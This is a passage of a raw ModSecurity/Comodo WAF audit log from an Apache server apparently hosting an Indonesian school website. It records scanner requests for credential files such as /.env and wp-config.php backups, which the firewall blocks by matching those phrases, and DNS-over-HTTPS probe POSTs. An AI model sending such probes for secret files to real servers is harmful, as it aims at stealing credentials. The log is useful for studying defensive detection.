userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746560683746435 28161 (- - -) Stopwatch2: 1746560683746435 28161; combined=19389, p1=617, p2=18450, p3=50, p4=68, p5=119, sr=132, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7447de63-Z-- --c83ec31a-A-- [07/May/2025:02:53:49 +0700] aBpozb5Kt25brCRGiyiZMAAAAAo 103.236.140.4 49834 103.236.140.4 8181 --c83ec31a-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --c83ec31a-C-- ¡10323614040test whitechunlol --c83ec31a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --c83ec31a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561229176749 5374 (- - -) Stopwatch2: 1746561229176749 5374; combined=4099, p1=814, p2=3131, p3=46, p4=71, p5=37, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c83ec31a-Z-- --9bdbe43a-A-- [07/May/2025:02:53:50 +0700] aBpoznQ-FFoo6luwbxIczgAAAMY 103.236.140.4 49856 103.236.140.4 8181 --9bdbe43a-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --9bdbe43a-C-- ¡10323614040test whitechunlol --9bdbe43a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bdbe43a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561230624649 4059 (- - -) Stopwatch2: 1746561230624649 4059; combined=2662, p1=575, p2=1977, p3=39, p4=36, p5=34, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bdbe43a-Z-- --1177c840-A-- [07/May/2025:02:53:50 +0700] aBpoznQ-FFoo6luwbxIczwAAAMk 103.236.140.4 49858 103.236.140.4 8181 --1177c840-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --1177c840-C-- ¡10323614040test whitechunlol --1177c840-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --1177c840-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561230857917 4039 (- - -) Stopwatch2: 1746561230857917 4039; combined=2417, p1=551, p2=1775, p3=33, p4=31, p5=27, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1177c840-Z-- --83067b3d-A-- [07/May/2025:02:53:51 +0700] aBpoz75Kt25brCRGiyiZMQAAABY 103.236.140.4 49860 103.236.140.4 8181 --83067b3d-B-- POST /doh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 43.130.153.36 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 43.130.153.36 X-Forwarded-Proto: https Connection: close Content-Length: 52 User-Agent: Go-http-client/1.1 Accept: application/dns-message Content-Type: application/dns-message --83067b3d-C-- ¡10323614040test whitechunlol --83067b3d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --83067b3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746561231091879 3002 (- - -) Stopwatch2: 1746561231091879 3002; combined=2025, p1=464, p2=1487, p3=20, p4=23, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83067b3d-Z-- --cc3fdd35-A-- [07/May/2025:05:10:25 +0700] aBqI0YyiPdJj1JUH57pmvAAAABE 103.236.140.4 48906 103.236.140.4 8181 --cc3fdd35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.112.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cc3fdd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc3fdd35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746569425974268 929 (- - -) Stopwatch2: 1746569425974268 929; combined=373, p1=333, p2=0, p3=0, p4=0, p5=39, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc3fdd35-Z-- --2a12a427-A-- [07/May/2025:05:51:39 +0700] aBqSe4yiPdJj1JUH57pm1QAAABE 103.236.140.4 49382 103.236.140.4 8181 --2a12a427-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2a12a427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a12a427-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899064173 919 (- - -) Stopwatch2: 1746571899064173 919; combined=344, p1=311, p2=0, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a12a427-Z-- --98ac7569-A-- [07/May/2025:05:51:39 +0700] aBqSe12wLCWKKTe5QCGxAAAAAEA 103.236.140.4 49386 103.236.140.4 8181 --98ac7569-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --98ac7569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98ac7569-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899186994 759 (- - -) Stopwatch2: 1746571899186994 759; combined=284, p1=249, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98ac7569-Z-- --87b8e524-A-- [07/May/2025:05:51:39 +0700] aBqSe4yiPdJj1JUH57pm1gAAABI 103.236.140.4 49390 103.236.140.4 8181 --87b8e524-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --87b8e524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87b8e524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746571899270075 811 (- - -) Stopwatch2: 1746571899270075 811; combined=361, p1=327, p2=0, p3=0, p4=0, p5=34, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87b8e524-Z-- --7f31b82e-A-- [07/May/2025:07:26:21 +0700] aBqorUkjCPYF0_E6F_IURAAAAJI 103.236.140.4 50082 103.236.140.4 8181 --7f31b82e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36 Accept-Charset: utf-8 --7f31b82e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f31b82e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746577581871536 909 (- - -) Stopwatch2: 1746577581871536 909; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f31b82e-Z-- --d802343c-A-- [07/May/2025:08:15:22 +0700] aBq0Kl2wLCWKKTe5QCGyXwAAAEA 103.236.140.4 51246 103.236.140.4 8181 --d802343c-B-- GET /wp-config.php_ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.58.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.58.160 X-Forwarded-Proto: http Connection: close Accept: */* --d802343c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d802343c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746580522049206 827 (- - -) Stopwatch2: 1746580522049206 827; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d802343c-Z-- --7bc55336-A-- [07/May/2025:08:17:27 +0700] aBq0p0kjCPYF0_E6F_IVJgAAAJM 103.236.140.4 51256 103.236.140.4 8181 --7bc55336-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 50.87.144.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 50.87.144.97 X-Forwarded-Proto: http Connection: close Accept: */* --7bc55336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bc55336-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746580647054864 886 (- - -) Stopwatch2: 1746580647054864 886; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bc55336-Z-- --6dcf2259-A-- [07/May/2025:11:19:27 +0700] aBrfT12wLCWKKTe5QCG0ugAAAEg 103.236.140.4 58884 103.236.140.4 8181 --6dcf2259-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.179.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.179.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6dcf2259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dcf2259-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746591567842459 815 (- - -) Stopwatch2: 1746591567842459 815; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dcf2259-Z-- --d956ae3b-A-- [07/May/2025:13:05:53 +0700] aBr4QV2wLCWKKTe5QCHAtwAAAEY 103.236.140.4 33654 103.236.140.4 8181 --d956ae3b-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d956ae3b-C-- ßÎexamplecom --d956ae3b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d956ae3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597953879176 4406 (- - -) Stopwatch2: 1746597953879176 4406; combined=2745, p1=571, p2=2062, p3=29, p4=35, p5=48, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d956ae3b-Z-- --d5650042-A-- [07/May/2025:13:05:55 +0700] aBr4Q12wLCWKKTe5QCHAugAAAFE 103.236.140.4 33672 103.236.140.4 8181 --d5650042-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d5650042-C-- zéexamplecom --d5650042-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5650042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597955017089 3388 (- - -) Stopwatch2: 1746597955017089 3388; combined=2147, p1=497, p2=1581, p3=21, p4=22, p5=25, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5650042-Z-- --2ae8447f-A-- [07/May/2025:13:05:55 +0700] aBr4Q12wLCWKKTe5QCHAvAAAAFI 103.236.140.4 33690 103.236.140.4 8181 --2ae8447f-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2ae8447f-C-- r£examplecom --2ae8447f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ae8447f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597955645818 4053 (- - -) Stopwatch2: 1746597955645818 4053; combined=2639, p1=577, p2=1974, p3=28, p4=33, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ae8447f-Z-- --20cd1d7d-A-- [07/May/2025:13:05:56 +0700] aBr4RIyiPdJj1JUH57p6BQAAABc 103.236.140.4 33704 103.236.140.4 8181 --20cd1d7d-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --20cd1d7d-C-- xyexamplecom --20cd1d7d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --20cd1d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597956282624 4062 (- - -) Stopwatch2: 1746597956282624 4062; combined=2512, p1=522, p2=1906, p3=27, p4=32, p5=25, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20cd1d7d-Z-- --2f6e0832-A-- [07/May/2025:13:05:56 +0700] aBr4RF2wLCWKKTe5QCHAvQAAAFQ 103.236.140.4 33718 103.236.140.4 8181 --2f6e0832-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2f6e0832-C-- ,±examplecom --2f6e0832-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f6e0832-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597956921486 3654 (- - -) Stopwatch2: 1746597956921486 3654; combined=2286, p1=526, p2=1682, p3=26, p4=30, p5=22, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f6e0832-Z-- --7f342577-A-- [07/May/2025:13:05:57 +0700] aBr4RV2wLCWKKTe5QCHAvwAAAFU 103.236.140.4 33732 103.236.140.4 8181 --7f342577-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --7f342577-C-- ¾ examplecom --7f342577-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f342577-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597957549425 4099 (- - -) Stopwatch2: 1746597957549425 4099; combined=2555, p1=515, p2=1949, p3=30, p4=34, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f342577-Z-- --4ddff959-A-- [07/May/2025:13:05:58 +0700] aBr4Rm3ZWOH0zu5xiSSZBAAAANM 103.236.140.4 33746 103.236.140.4 8181 --4ddff959-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --4ddff959-C-- öÞexamplecom --4ddff959-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --4ddff959-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 